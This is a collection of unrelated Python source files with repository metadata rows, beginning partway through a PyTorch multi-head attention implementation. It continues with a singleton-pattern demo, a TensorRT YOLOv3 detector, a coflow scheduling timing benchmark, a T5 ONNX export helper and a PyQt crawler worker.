            xavier_uniform_(self.k_proj_weight)
            xavier_uniform_(self.v_proj_weight)
        if self.in_proj_bias is not None:
            constant_(self.in_proj_bias, 0.)
            constant_(self.out_proj.bias, 0.)
        if self.bias_k is not None:
            xavier_normal_(self.bias_k)
        if self.bias_v is not None:
            xavier_normal_(self.bias_v)

    def __setstate__(self, state):
        # Support loading old MultiheadAttention checkpoints generated by v1.1.0
        if '_qkv_same_embed_dim' not in state:
            state['_qkv_same_embed_dim'] = True
        super(MultiheadAttention, self).__setstate__(state)

    def forward(self, query, key, value, key_padding_mask=None,
                need_weights=True, attn_mask=None):
        # type: (Tensor, Tensor, Tensor, Optional[Tensor], bool, Optional[Tensor]) -> Tuple[Tensor, Optional[Tensor]]
        """Run attention; query/key/value are (seq_len, batch, dim).

        Returns (attn_output, head-averaged attention weights or None).
        """
        if not self._qkv_same_embed_dim:
            return multi_head_attention_forward(
                query, key, value, self.embed_dim, self.num_heads,
                self.in_proj_weight, self.in_proj_bias,
                self.bias_k, self.bias_v, self.add_zero_attn,
                self.dropout, self.out_proj.weight, self.out_proj.bias,
                training=self.training,
                key_padding_mask=key_padding_mask, need_weights=need_weights,
                attn_mask=attn_mask, use_separate_proj_weight=True,
                q_proj_weight=self.q_proj_weight, k_proj_weight=self.k_proj_weight,
                v_proj_weight=self.v_proj_weight)
        else:
            return multi_head_attention_forward(
                query, key, value, self.embed_dim, self.num_heads,
                self.in_proj_weight, self.in_proj_bias,
                self.bias_k, self.bias_v, self.add_zero_attn,
                self.dropout, self.out_proj.weight, self.out_proj.bias,
                training=self.training,
                key_padding_mask=key_padding_mask, need_weights=need_weights,
                attn_mask=attn_mask)
def multi_head_attention_forward(
    query: Tensor,
    key: Tensor,
    value: Tensor,
    embed_dim_to_check: int,
    num_heads: int,
    in_proj_weight: Tensor,
    in_proj_bias: Tensor,
    bias_k: Optional[Tensor],
    bias_v: Optional[Tensor],
    add_zero_attn: bool,
    dropout_p: float,
    out_proj_weight: Tensor,
    out_proj_bias: Tensor,
    training: bool = True,
    key_padding_mask: Optional[Tensor] = None,
    need_weights: bool = True,
    attn_mask: Optional[Tensor] = None,
    use_separate_proj_weight: bool = False,
    q_proj_weight: Optional[Tensor] = None,
    k_proj_weight: Optional[Tensor] = None,
    v_proj_weight: Optional[Tensor] = None,
    static_k: Optional[Tensor] = None,
    static_v: Optional[Tensor] = None,
) -> Tuple[Tensor, Optional[Tensor]]:
    """Functional core of multi-head attention (vendored from
    ``torch.nn.functional.multi_head_attention_forward``).

    query is (tgt_len, bsz, embed_dim); key/value share their first two
    dims.  Returns (attn_output, head-averaged attention weights) when
    ``need_weights`` else (attn_output, None).

    NOTE(review): the deprecation branches below call ``warnings.warn``,
    but ``warnings`` does not appear among this module's visible imports —
    verify it is imported, otherwise a uint8 mask raises NameError.
    """
    # __torch_function__ override dispatch (subclassed tensors).
    tens_ops = (query, key, value, in_proj_weight, in_proj_bias, bias_k, bias_v, out_proj_weight, out_proj_bias)
    if has_torch_function(tens_ops):
        return handle_torch_function(
            multi_head_attention_forward,
            tens_ops,
            query,
            key,
            value,
            embed_dim_to_check,
            num_heads,
            in_proj_weight,
            in_proj_bias,
            bias_k,
            bias_v,
            add_zero_attn,
            dropout_p,
            out_proj_weight,
            out_proj_bias,
            training=training,
            key_padding_mask=key_padding_mask,
            need_weights=need_weights,
            attn_mask=attn_mask,
            use_separate_proj_weight=use_separate_proj_weight,
            q_proj_weight=q_proj_weight,
            k_proj_weight=k_proj_weight,
            v_proj_weight=v_proj_weight,
            static_k=static_k,
            static_v=static_v,
        )
    tgt_len, bsz, embed_dim = query.size()
    assert embed_dim == embed_dim_to_check
    # allow MHA to have different sizes for the feature dimension
    assert key.size(0) == value.size(0) and key.size(1) == value.size(1)

    if isinstance(embed_dim, torch.Tensor):
        # embed_dim can be a tensor when JIT tracing
        head_dim = embed_dim.div(num_heads, rounding_mode='trunc')
    else:
        head_dim = embed_dim // num_heads
    assert head_dim * num_heads == embed_dim, "embed_dim must be divisible by num_heads"
    # 1/sqrt(head_dim) scaling applied to q before the dot products.
    scaling = float(head_dim) ** -0.5

    # --- input projections: compute q, k, v ---
    if not use_separate_proj_weight:
        if (query is key or torch.equal(query, key)) and (key is value or torch.equal(key, value)):
            # self-attention: one packed projection, split in thirds
            q, k, v = F.linear(query, in_proj_weight, in_proj_bias).chunk(3, dim=-1)

        elif key is value or torch.equal(key, value):
            # encoder-decoder attention
            # This is inline in_proj function with in_proj_weight and in_proj_bias
            _b = in_proj_bias
            _start = 0
            _end = embed_dim
            _w = in_proj_weight[_start:_end, :]
            if _b is not None:
                _b = _b[_start:_end]
            q = F.linear(query, _w, _b)

            if key is None:
                assert value is None
                k = None
                v = None
            else:
                # This is inline in_proj function with in_proj_weight and in_proj_bias
                _b = in_proj_bias
                _start = embed_dim
                _end = None
                _w = in_proj_weight[_start:, :]
                if _b is not None:
                    _b = _b[_start:]
                k, v = F.linear(key, _w, _b).chunk(2, dim=-1)

        else:
            # fully distinct q, k, v: slice the packed weight three ways
            # This is inline in_proj function with in_proj_weight and in_proj_bias
            _b = in_proj_bias
            _start = 0
            _end = embed_dim
            _w = in_proj_weight[_start:_end, :]
            if _b is not None:
                _b = _b[_start:_end]
            q = F.linear(query, _w, _b)

            # This is inline in_proj function with in_proj_weight and in_proj_bias
            _b = in_proj_bias
            _start = embed_dim
            _end = embed_dim * 2
            _w = in_proj_weight[_start:_end, :]
            if _b is not None:
                _b = _b[_start:_end]
            k = F.linear(key, _w, _b)

            # This is inline in_proj function with in_proj_weight and in_proj_bias
            _b = in_proj_bias
            _start = embed_dim * 2
            _end = None
            _w = in_proj_weight[_start:, :]
            if _b is not None:
                _b = _b[_start:]
            v = F.linear(value, _w, _b)
    else:
        # separate q/k/v projection weights (kdim/vdim != embed_dim case)
        q_proj_weight_non_opt = torch.jit._unwrap_optional(q_proj_weight)
        len1, len2 = q_proj_weight_non_opt.size()
        assert len1 == embed_dim and len2 == query.size(-1)

        k_proj_weight_non_opt = torch.jit._unwrap_optional(k_proj_weight)
        len1, len2 = k_proj_weight_non_opt.size()
        assert len1 == embed_dim and len2 == key.size(-1)

        v_proj_weight_non_opt = torch.jit._unwrap_optional(v_proj_weight)
        len1, len2 = v_proj_weight_non_opt.size()
        assert len1 == embed_dim and len2 == value.size(-1)

        if in_proj_bias is not None:
            q = F.linear(query, q_proj_weight_non_opt, in_proj_bias[0:embed_dim])
            k = F.linear(key, k_proj_weight_non_opt, in_proj_bias[embed_dim : (embed_dim * 2)])
            v = F.linear(value, v_proj_weight_non_opt, in_proj_bias[(embed_dim * 2) :])
        else:
            q = F.linear(query, q_proj_weight_non_opt, in_proj_bias)
            k = F.linear(key, k_proj_weight_non_opt, in_proj_bias)
            v = F.linear(value, v_proj_weight_non_opt, in_proj_bias)
    q = q * scaling

    # --- validate / normalize attn_mask ---
    if attn_mask is not None:
        assert (
            attn_mask.dtype == torch.float32
            or attn_mask.dtype == torch.float64
            or attn_mask.dtype == torch.float16
            or attn_mask.dtype == torch.uint8
            or attn_mask.dtype == torch.bool
        ), "Only float, byte, and bool types are supported for attn_mask, not {}".format(attn_mask.dtype)
        if attn_mask.dtype == torch.uint8:
            warnings.warn("Byte tensor for attn_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead.")
            attn_mask = attn_mask.to(torch.bool)

        if attn_mask.dim() == 2:
            # broadcast a 2D mask over all batch*head rows
            attn_mask = attn_mask.unsqueeze(0)
            if list(attn_mask.size()) != [1, query.size(0), key.size(0)]:
                raise RuntimeError("The size of the 2D attn_mask is not correct.")
        elif attn_mask.dim() == 3:
            if list(attn_mask.size()) != [bsz * num_heads, query.size(0), key.size(0)]:
                raise RuntimeError("The size of the 3D attn_mask is not correct.")
        else:
            raise RuntimeError("attn_mask's dimension {} is not supported".format(attn_mask.dim()))
        # attn_mask's dim is 3 now.

    # convert ByteTensor key_padding_mask to bool
    if key_padding_mask is not None and key_padding_mask.dtype == torch.uint8:
        warnings.warn(
            "Byte tensor for key_padding_mask in nn.MultiheadAttention is deprecated. Use bool tensor instead."
        )
        key_padding_mask = key_padding_mask.to(torch.bool)

    # --- optional learned bias rows appended to k/v (add_bias_kv) ---
    if bias_k is not None and bias_v is not None:
        if static_k is None and static_v is None:
            k = torch.cat([k, bias_k.repeat(1, bsz, 1)])
            v = torch.cat([v, bias_v.repeat(1, bsz, 1)])
            if attn_mask is not None:
                # extend the masks to cover the extra key position
                attn_mask = F.pad(attn_mask, (0, 1))
            if key_padding_mask is not None:
                key_padding_mask = F.pad(key_padding_mask, (0, 1))
        else:
            assert static_k is None, "bias cannot be added to static key."
            assert static_v is None, "bias cannot be added to static value."
    else:
        assert bias_k is None
        assert bias_v is None

    # --- reshape to (bsz*num_heads, seq_len, head_dim) ---
    q = q.contiguous().view(tgt_len, bsz * num_heads, head_dim).transpose(0, 1)
    if k is not None:
        k = k.contiguous().view(-1, bsz * num_heads, head_dim).transpose(0, 1)
    if v is not None:
        v = v.contiguous().view(-1, bsz * num_heads, head_dim).transpose(0, 1)

    # static k/v (e.g. precomputed in incremental decoding) replace the
    # projected ones entirely
    if static_k is not None:
        assert static_k.size(0) == bsz * num_heads
        assert static_k.size(2) == head_dim
        k = static_k

    if static_v is not None:
        assert static_v.size(0) == bsz * num_heads
        assert static_v.size(2) == head_dim
        v = static_v

    src_len = k.size(1)

    if key_padding_mask is not None:
        assert key_padding_mask.size(0) == bsz
        assert key_padding_mask.size(1) == src_len

    # --- optional all-zero attention column ---
    if add_zero_attn:
        src_len += 1
        k = torch.cat([k, torch.zeros((k.size(0), 1) + k.size()[2:], dtype=k.dtype, device=k.device)], dim=1)
        v = torch.cat([v, torch.zeros((v.size(0), 1) + v.size()[2:], dtype=v.dtype, device=v.device)], dim=1)
        if attn_mask is not None:
            attn_mask = F.pad(attn_mask, (0, 1))
        if key_padding_mask is not None:
            key_padding_mask = F.pad(key_padding_mask, (0, 1))

    # --- scaled dot-product attention ---
    attn_output_weights = torch.bmm(q, k.transpose(1, 2))
    assert list(attn_output_weights.size()) == [bsz * num_heads, tgt_len, src_len]

    if attn_mask is not None:
        # bool mask: hard -inf fill; float mask: additive
        if attn_mask.dtype == torch.bool:
            attn_output_weights.masked_fill_(attn_mask, float("-inf"))
        else:
            attn_output_weights += attn_mask

    if key_padding_mask is not None:
        attn_output_weights = attn_output_weights.view(bsz, num_heads, tgt_len, src_len)
        attn_output_weights = attn_output_weights.masked_fill(
            key_padding_mask.unsqueeze(1).unsqueeze(2),
            float("-inf"),
        )
        attn_output_weights = attn_output_weights.view(bsz * num_heads, tgt_len, src_len)

    attn_output_weights = F.softmax(attn_output_weights, dim=-1)
    attn_output_weights = F.dropout(attn_output_weights, p=dropout_p, training=training)

    attn_output = torch.bmm(attn_output_weights, v)
    assert list(attn_output.size()) == [bsz * num_heads, tgt_len, head_dim]
    # recombine heads and apply the output projection
    attn_output = attn_output.transpose(0, 1).contiguous().view(tgt_len, bsz, embed_dim)
    attn_output = F.linear(attn_output, out_proj_weight, out_proj_bias)

    if need_weights:
        # average attention weights over heads
        attn_output_weights = attn_output_weights.view(bsz, num_heads, tgt_len, src_len)
        return attn_output, attn_output_weights.mean(dim=1)
    else:
        return attn_output, None
| PJLab-ADG/SensorsCalibration | SensorX2car/camera2car/auto_calib/models/multi_head_attention.py | multi_head_attention.py | py | 15,197 | python | en | code | 1,730 | github-code | 90 |
5347916044 |
# 单例设计模式
class Singleton:
    """Singleton: only one instance is ever created and only the first
    ``__init__`` call is allowed to set its attributes."""

    # Class-level slot holding the single shared instance (None until created).
    __instance = None
    # True until the first __init__ has run; later inits are ignored.
    __is_first = True

    def __new__(cls, *args, **kwargs):
        """Create the shared instance on first use, then keep returning it.

        Note: ``__new__`` is implicitly a static method, so no ``@classmethod``
        decorator is needed — the original decorator only worked by accident
        (the class got bound twice and the extra binding fell into *args).
        """
        if cls.__instance is None:
            cls.__instance = object.__new__(cls)
        return cls.__instance

    def __init__(self, a, b) -> None:
        """Store ``a`` and ``b``, but only on the very first initialisation."""
        if Singleton.__is_first:
            self.a = a
            self.b = b
            # Flip the class-level flag instead of shadowing it on the
            # instance: clearer, and behaviour is identical for a singleton.
            Singleton.__is_first = False

    def __str__(self):
        return "a is {} and b is {}".format(self.a, self.b)
# A class that records how many instances have been created through it
class Person:
    """A person that keeps a running count of how many instances were made."""

    # Number of Person objects initialised so far (shared across instances).
    __count = 0

    def __new__(cls, *args, **kwargs):
        # Plain allocation via object; the arguments are consumed by __init__.
        return object.__new__(cls)

    def __init__(self, name, age) -> None:
        # Every successful initialisation bumps the shared counter.
        Person.__count = Person.__count + 1
        self.name = name
        self.age = age

    def __str__(self):
        return "name is {} and age is {}".format(self.name, self.age)

    @classmethod
    def get_count(cls):
        """Return how many Person objects have been initialised."""
        return cls.__count
# Demo: Person counts initialised instances; Singleton always returns one object.
if __name__ == "__main__":
    p1 = Person("zhangsan",13)
    p2 = Person("lisi",22)
    print(p1)
    print(p2)
    # object.__new__ bypasses Person.__new__ AND __init__, so the counter is
    # not bumped yet and the instance has no attributes.
    p3 = object.__new__(Person)
    # __init__ must be called explicitly here: without it p3 would have no
    # name/age attributes and printing it would raise AttributeError.
    p3.__init__("wangwu",23)
    print(p3)
    print(Person.get_count())
    s1 = Singleton(1,2)
    s2 = Singleton(2,3)
    # Both names refer to the same shared instance, so this prints True and
    # both prints show the values from the FIRST initialisation.
    print(s1 is s2)
    print(s1)
    print(s2)
    pass
| zxm66/python | src/python_base/python_design_patten.py | python_design_patten.py | py | 1,421 | python | en | code | 0 | github-code | 90 |
23328685889 | import tensorflow as tf
import colorsys
import numpy as np
import os
from gymnoscamera.yolo_network.model import yolo_eval
from keras import backend as K
input_names = ['input_1']
output_names = ['conv2d_59/BiasAdd', 'conv2d_67/BiasAdd', 'conv2d_75/BiasAdd']
class Yolo_v3_rt:
    """YOLOv3 person detector running on a TensorRT-optimised frozen TF graph.

    The engine is loaded from ./trt_graph.pb; the input/output tensor names
    (input_1, conv2d_59/67/75 BiasAdd) are fixed by the converted graph.
    """

    # Default configuration; instance attributes are populated from this dict.
    _defaults = {
        "model_path": None,
        "anchors_path": 'model_data/yolo_anchors.txt',
        "classes_path": 'model_data/coco_classes.txt',
        "score": 0.3,
        "iou": 0.45,
        "model_image_size": (256, 256),
        "gpu_num": 1,
    }

    def __init__(self):
        self.__dict__.update(self._defaults)  # set up default values
        self.tf_sess = self.load_tf_rt_graph()
        # Raw YOLO head outputs at the three detection scales.
        self.output_tensor = []
        self.output_tensor.append(self.tf_sess.graph.get_tensor_by_name('conv2d_59/BiasAdd:0'))
        self.output_tensor.append(self.tf_sess.graph.get_tensor_by_name('conv2d_67/BiasAdd:0'))
        self.output_tensor.append(self.tf_sess.graph.get_tensor_by_name('conv2d_75/BiasAdd:0'))
        self.input_tensor = self.tf_sess.graph.get_tensor_by_name('input_1:0')
        self.class_names = self._get_class()
        self.anchors = self._get_anchors()
        self.boxes, self.scores, self.classes = self.generate()

    def get_frozen_graph(self, graph_file):
        """Read Frozen Graph file from disk."""
        with tf.gfile.FastGFile(graph_file, "rb") as f:
            graph_def = tf.GraphDef()
            graph_def.ParseFromString(f.read())
        return graph_def

    def load_tf_rt_graph(self):
        # Load the TensorRT-converted graph into a fresh TF1 session.
        tf.keras.backend.clear_session()
        trt_graph = self.get_frozen_graph('./trt_graph.pb')
        # Create session and load graph
        tf_config = tf.ConfigProto()
        tf_config.gpu_options.allow_growth = True
        tf_sess = tf.Session(config=tf_config)
        tf.import_graph_def(trt_graph, name='')
        return tf_sess

    def _get_class(self):
        """Return the list of class names read from classes_path."""
        classes_path = os.path.expanduser(os.path.join(os.path.dirname(__file__), self.classes_path))
        with open(classes_path) as f:
            class_names = f.readlines()
        class_names = [c.strip() for c in class_names]
        return class_names

    def _get_anchors(self):
        """Return anchor boxes as an (N, 2) numpy array read from anchors_path."""
        anchors_path = os.path.expanduser(os.path.join(os.path.dirname(__file__), self.anchors_path))
        with open(anchors_path) as f:
            anchors = f.readline()
        anchors = [float(x) for x in anchors.split(',')]
        return np.array(anchors).reshape(-1, 2)

    def generate(self):
        """Build the filtered-detection graph; return (boxes, scores, classes) tensors."""
        # Generate colors for drawing bounding boxes.
        hsv_tuples = [(x / len(self.class_names), 1., 1.)
                      for x in range(len(self.class_names))]
        self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
        self.colors = list(
            map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
                self.colors))
        np.random.seed(10101)  # Fixed seed for consistent colors across runs.
        np.random.shuffle(self.colors)  # Shuffle colors to decorrelate adjacent classes.
        np.random.seed(None)  # Reset seed to default.
        # Generate output tensor targets for filtered bounding boxes.
        self.input_image_shape = K.placeholder(shape=(2,))
        boxes, scores, classes = yolo_eval(self.output_tensor, self.anchors,
                                           len(self.class_names), self.input_image_shape,
                                           score_threshold=self.score, iou_threshold=self.iou)
        return boxes, scores, classes

    def detect_image(self, image):
        """Run detection on an RGB image; return "person" boxes as
        (left, top, right, bottom) pixel tuples.

        NOTE(review): the returned coordinates are shifted/shrunk by the loop
        index i (left + i, top + i, right - i, bottom - i) — confirm against
        callers whether this offset is intentional.
        """
        image_data = np.array(image, dtype='float32')
        (image_height, image_width, channels) = image_data.shape
        image_data /= 255.
        image_data = np.expand_dims(image_data, 0)  # Add batch dimension.
        out_boxes, out_scores, out_classes = self.tf_sess.run(
            [self.boxes, self.scores, self.classes],
            feed_dict={
                self.input_tensor: image_data,
                self.input_image_shape: [image_height, image_width],
            })
        print(out_boxes.shape)
        list_of_coords = []
        for i, c in reversed(list(enumerate(out_classes))):
            predicted_class = self.class_names[c]
            if predicted_class == "person":
                box = out_boxes[i]
                top, left, bottom, right = box
                # Round to integers and clamp to the image bounds.
                top = max(0, np.floor(top + 0.5).astype('int32'))
                left = max(0, np.floor(left + 0.5).astype('int32'))
                bottom = min(image_height, np.floor(bottom + 0.5).astype('int32'))
                right = min(image_width, np.floor(right + 0.5).astype('int32'))
                list_of_coords.append((left + i, top + i, right - i, bottom - i))
        return list_of_coords
| Gymnos-AI/Gymnos-Camera | gymnoscamera/yolo_network_rt/yolo_v3_rt.py | yolo_v3_rt.py | py | 4,796 | python | en | code | 0 | github-code | 90 |
26884454320 | from persianmeme.translations import admin_messages
from persianmeme.models import User, MemeType
from persianmeme.classes import User as UserClass
def handler(text: str, user: UserClass):
    """Store the tags for the meme being created and prompt for the file."""
    if not user.process_meme_tags(text):
        return
    user.database.menu = User.Menu.ADMIN_NEW_MEME
    # Voice and video memes use different back menus and prompt wording.
    if user.database.temp_meme_type == MemeType.VOICE:
        user.database.back_menu = 'voice_tags'
        meme_translation = admin_messages['voice']
    else:
        user.database.back_menu = 'video_tags'
        meme_translation = admin_messages['video']
    user.send_message(user.translate('send_meme', meme_translation))
| Sholex-Team/LilSholex | persianmeme/handlers/message/menus/admin/menus/meme_tags.py | meme_tags.py | py | 640 | python | en | code | 38 | github-code | 90 |
38202887405 | import random
from pathlib import Path
from typing import List
import logging
import numpy
import torch
from transformers import T5Config
from onnxruntime import InferenceSession
logger = logging.getLogger(__name__)
class T5Encoder(torch.nn.Module):
    """Wrapper around a T5 encoder that exposes only the last hidden state."""

    def __init__(self, encoder, config: T5Config):
        super().__init__()
        self.encoder = encoder
        self.config = config

    def forward(self, input_ids, attention_mask):
        # The wrapped encoder returns a tuple; element 0 is last_hidden_state.
        encoder_outputs = self.encoder(input_ids, attention_mask)
        return encoder_outputs[0]
class T5EncoderInputs:
    """Container for the two tensors a T5 encoder consumes."""

    def __init__(self, input_ids, attention_mask):
        self.input_ids: torch.LongTensor = input_ids
        self.attention_mask: torch.LongTensor = attention_mask

    @staticmethod
    def create_dummy(batch_size: int, sequence_length: int, vocab_size: int,
                     device: torch.device):  # -> T5EncoderInputs
        """Create dummy inputs for T5 encoder.

        Args:
            batch_size (int): batch size
            sequence_length (int): sequence length
            vocab_size (int): vocabulary size
            device (torch.device): device of output tensors

        Returns:
            T5EncoderInputs: dummy inputs for encoder
        """
        input_ids = torch.randint(
            low=0,
            high=vocab_size - 1,
            size=(batch_size, sequence_length),
            dtype=torch.int64,
            device=device,
        )
        attention_mask = torch.ones([batch_size, sequence_length], dtype=torch.int64, device=device)
        if sequence_length >= 2:
            # Zero a random-length prefix per row to simulate padding.
            for row in range(batch_size):
                padding_position = random.randint(0, sequence_length - 1)
                attention_mask[row, :padding_position] = 0
        return T5EncoderInputs(input_ids, attention_mask)

    def to_list(self) -> List:
        # Ordered list of the non-None tensors (model call order).
        return [tensor for tensor in (self.input_ids, self.attention_mask) if tensor is not None]
class T5EncoderHelper:
    """Static helpers to export a T5Encoder to ONNX and validate the export."""

    @staticmethod
    def export_onnx(encoder: T5Encoder,
                    device: torch.device,
                    onnx_model_path: str,
                    verbose: bool = True,
                    use_external_data_format: bool = False):
        """Export encoder to ONNX

        Args:
            encoder (T5Encoder): encoder object
            device (torch.device): device of encoder object
            onnx_model_path (str): onnx path
            verbose (bool, optional): print verbose information. Defaults to True.
            use_external_data_format (bool, optional): use external data format or not. Defaults to False.
        """
        config = encoder.config
        # A tiny dummy batch suffices to trace the graph; the batch and
        # sequence axes are declared dynamic below.
        encoder_inputs = T5EncoderInputs.create_dummy(batch_size=2,
                                                      sequence_length=4,
                                                      vocab_size=config.vocab_size,
                                                      device=device)
        with torch.no_grad():
            outputs = encoder(encoder_inputs.input_ids, encoder_inputs.attention_mask)
        Path(onnx_model_path).parent.mkdir(parents=True, exist_ok=True)
        torch.onnx.export(encoder,
                          args=tuple(encoder_inputs.to_list()),
                          f=onnx_model_path,
                          export_params=True,
                          input_names=['input_ids', 'attention_mask'],
                          output_names=['hidden_states'],
                          example_outputs=outputs,
                          dynamic_axes={
                              'input_ids': {
                                  0: 'batch_size',
                                  1: 'sequence_length'
                              },
                              'attention_mask': {
                                  0: 'batch_size',
                                  1: 'sequence_length'
                              },
                              'hidden_states': {
                                  0: 'batch_size',
                                  1: 'sequence_length'
                              },
                          },
                          opset_version=12,
                          do_constant_folding=True,
                          use_external_data_format=use_external_data_format,
                          verbose=verbose)

    @staticmethod
    def onnxruntime_inference(ort_session, inputs: T5EncoderInputs):
        """ Run inference of ONNX model.
        """
        # ONNX Runtime requires contiguous numpy arrays on the host.
        ort_inputs = {
            'input_ids': numpy.ascontiguousarray(inputs.input_ids.cpu().numpy()),
            'attention_mask': numpy.ascontiguousarray(inputs.attention_mask.cpu().numpy())
        }
        return ort_session.run(None, ort_inputs)

    @staticmethod
    def verify_onnx(model: T5Encoder, ort_session: InferenceSession, device: torch.device):
        """ Compare the result from PyTorch and OnnxRuntime to verify the ONNX model is good.
        """
        inputs = T5EncoderInputs.create_dummy(batch_size=4,
                                              sequence_length=11,
                                              vocab_size=model.config.vocab_size,
                                              device=device)
        input_list = inputs.to_list()
        torch_outputs = model(*input_list)
        ort_outputs = T5EncoderHelper.onnxruntime_inference(ort_session, inputs)
        # Worst-case element-wise deviation between the two backends.
        max_diff = numpy.amax(numpy.abs(torch_outputs.cpu().numpy() - ort_outputs[0]))
        logger.info(f'max_diff={max_diff}')
        return max_diff
| fengbingchun/PyTorch_Test | src/onnxruntime/onnxruntime/python/tools/transformers/models/t5/t5_encoder.py | t5_encoder.py | py | 5,658 | python | en | code | 14 | github-code | 90 |
30619963015 | from gurobipy import *
from traceProducer.traceProducer import *
from traceProducer.jobClassDescription import *
from datastructures.jobCollection import *
from simulator.simulator import *
import numpy as np
import matplotlib.pyplot as plt
import time
# Compare the running time of the FDLS and Weaver coflow-scheduling heuristics
# on randomly generated divisible coflow traces, then persist and plot results.
instanceOfAlgo = ["FDLS", "Weaver"]

rawFDLS = []
rawWeaver = []
FDLS = []
Weaver = []

rseed = 13
turn = 100

listOfTurnsFDLS = []
average_FDLS = 0
listOfTurnsWeaver = []
average_Weaver = 0

while turn > 0:
    print(turn)
    numRacks = 4
    numJobs = 8
    randomSeed = rseed

    jobClassDescs = [JobClassDescription(1, 4, 1, 10),
                     JobClassDescription(1, 4, 10, 1000),
                     JobClassDescription(4, numRacks, 1, 10),
                     JobClassDescription(4, numRacks, 10, 1000)]

    fracsOfClasses = [41,
                      29,
                      9,
                      21]

    tr = CustomTraceProducer(numRacks, numJobs, jobClassDescs, fracsOfClasses, randomSeed)
    tr.prepareTrace()

    sim = Simulator(tr)

    K = tr.getNumJobs()
    N = tr.getNumRacks()
    I = N
    J = N
    M = 10

    d, flowlist = tr.produceFlowSizeAndList()

    # ---------------- FDLS ----------------
    start = time.time()

    loadI = np.zeros((M, I))
    loadO = np.zeros((M, J))
    A = [[] for h in range(M)]

    flowlist.sort(key=lambda f: f[4])

    for f in flowlist:
        h_star = -1
        minload = float("inf")
        for h in range(M):
            if loadI[h][f[1]] + loadO[h][f[2]] < minload:
                h_star = h
                minload = loadI[h][f[1]] + loadO[h][f[2]]
        A[h_star].append([f[3], f[4]])
        loadI[h_star][f[1]] += f[0]
        loadO[h_star][f[2]] += f[0]

    end = time.time()
    executionTimeOfFDLS = end - start
    print("========================================================")
    print('execution time of FDLS: %f' % executionTimeOfFDLS)
    print("========================================================")
    listOfTurnsFDLS.append(executionTimeOfFDLS)

    # ---------------- Weaver ----------------
    # BUG FIX: restart the timer here. The original reused the FDLS `start`,
    # so Weaver's measured time wrongly included the whole FDLS run (and the
    # printing in between), inflating every Weaver sample.
    start = time.time()

    loadI = np.zeros((M, I))
    loadO = np.zeros((M, J))
    L = [0 for h in range(M)]
    A = [[] for h in range(M)]

    flowlist.sort(key=lambda f: f[0], reverse=True)

    for f in flowlist:
        h_star = -1
        minload = float("inf")

        # flag == 1 when placing f on any path would raise that path's makespan.
        flag = -1
        for h in range(M):
            if loadI[h][f[1]] + f[0] > L[h]:
                flag = 1
            if loadO[h][f[2]] + f[0] > L[h]:
                flag = 1

        if flag == 1:
            # Pick the path minimising the resulting makespan.
            for h in range(M):
                maxload = max(max(loadI[h][f[1]] + f[0], loadO[h][f[2]] + f[0]), L[h])
                if maxload < minload:
                    h_star = h
                    minload = maxload

        if h_star == -1:
            # Fallback: tentatively place f on each path and keep the best.
            minload = float("inf")
            for h in range(M):
                loadI[h][f[1]] += f[0]
                loadO[h][f[2]] += f[0]
                maxload = max(loadI[h][f[1]], loadO[h][f[2]])
                loadI[h][f[1]] -= f[0]
                loadO[h][f[2]] -= f[0]
                if maxload < minload:
                    h_star = h
                    minload = maxload

        A[h_star].append(f[3])
        loadI[h_star][f[1]] += f[0]
        loadO[h_star][f[2]] += f[0]
        if loadI[h_star][f[1]] > L[h_star]:
            L[h_star] = loadI[h_star][f[1]]
        if loadO[h_star][f[2]] > L[h_star]:
            L[h_star] = loadO[h_star][f[2]]

    end = time.time()
    executionTimeOfWeaver = end - start
    print("========================================================")
    print('execution time of Weaver: %f' % executionTimeOfWeaver)
    print("========================================================")
    listOfTurnsWeaver.append(executionTimeOfWeaver)

    rseed += 1
    turn -= 1

# Average the per-turn execution times for each heuristic.
for f in listOfTurnsFDLS:
    average_FDLS += f
average_FDLS /= len(listOfTurnsFDLS)
FDLS.append(average_FDLS)
rawFDLS.append(listOfTurnsFDLS)

for w in listOfTurnsWeaver:
    average_Weaver += w
average_Weaver /= len(listOfTurnsWeaver)
Weaver.append(average_Weaver)
rawWeaver.append(listOfTurnsWeaver)

raw = {'rawFDLS': rawFDLS, 'rawWeaver': rawWeaver}
algo = {'FDLS': FDLS, 'Weaver': Weaver}

# Persist raw samples and averages as whitespace-separated records.
# (Use a context manager so the file is closed even on an exception;
# also avoids shadowing the `file` builtin.)
with open('../result/custom_divisible_time_complexity/custom_divisible_time_complexity.txt', 'w') as result_file:
    for key, values in raw.items():
        result_file.write(key + ' ' + str(len(values)))
        for value in values:
            result_file.write(' ' + str(len(value)))
            for v in value:
                result_file.write(' ' + str(v))
        result_file.write('\n')

    for key, values in algo.items():
        result_file.write(key + ' ' + str(len(values)))
        for value in values:
            result_file.write(' ' + str(value))
        result_file.write('\n')

# Figure: 15x10 inches at 100 dpi.
plt.figure(figsize=(15, 10), dpi=100, linewidth=2)

x = np.arange(len(instanceOfAlgo))
width = 0.3

plt.bar(x[0], FDLS, width, color='g', label="FDLS")
plt.bar(x[1], Weaver, width, color='b', label="Weaver")

# Title; x/y place the title relative to the axes.
plt.title("Divisible coflows from custom", size=40, x=0.5, y=1.03)

# Tick labels and font sizes.
plt.xticks(x, instanceOfAlgo, fontsize=20)
plt.yticks(fontsize=20)

# Axis labels (labelpad is the distance from the axis).
plt.xlabel("Algorithms", fontsize=30, labelpad=15)
plt.ylabel("Execution time (s)", fontsize=30, labelpad=20)

# Legend placement.
plt.legend(loc="best", fontsize=20)

plt.show()
9901717670 | # -*- coding: utf-8 -*-
import time
from PyQt5.QtCore import QThread, pyqtSignal
from crawler.controller import Controller
class Worker(QThread):
    """Background thread that fetches course/assignment data via Controller.

    Emits ``fetch_finished`` with a dict payload; the very first run also
    emits the course info before the assignments.
    """

    # Payload is the dict returned by the Controller fetch calls.
    fetch_finished = pyqtSignal(dict)

    def __init__(self, parent, uid, upw):
        super().__init__(parent)
        self.parent = parent
        # True while run() is executing (simple busy flag for callers).
        self.isRunning = False
        # True until the first run; gates the one-time course-info fetch.
        self.init = True
        self.controller = Controller(uid, upw)

    def run(self):
        self.isRunning = True
        # Progress message shown while crawling (Korean: "the lion is busy
        # searching the jungle..!").
        self.parent.titleButton.setText("사자가 열심히 정글을 뒤지고 있어요..!")
        if self.init:
            self.init = False
            self.fetch_finished.emit(self.controller.get_course_info())
        data = self.controller.get_all_assignments()
        self.fetch_finished.emit(data)
        # Restore the idle title (Korean: "king of the jungle").
        self.parent.titleButton.setText("밀림의 왕")
        self.isRunning = False
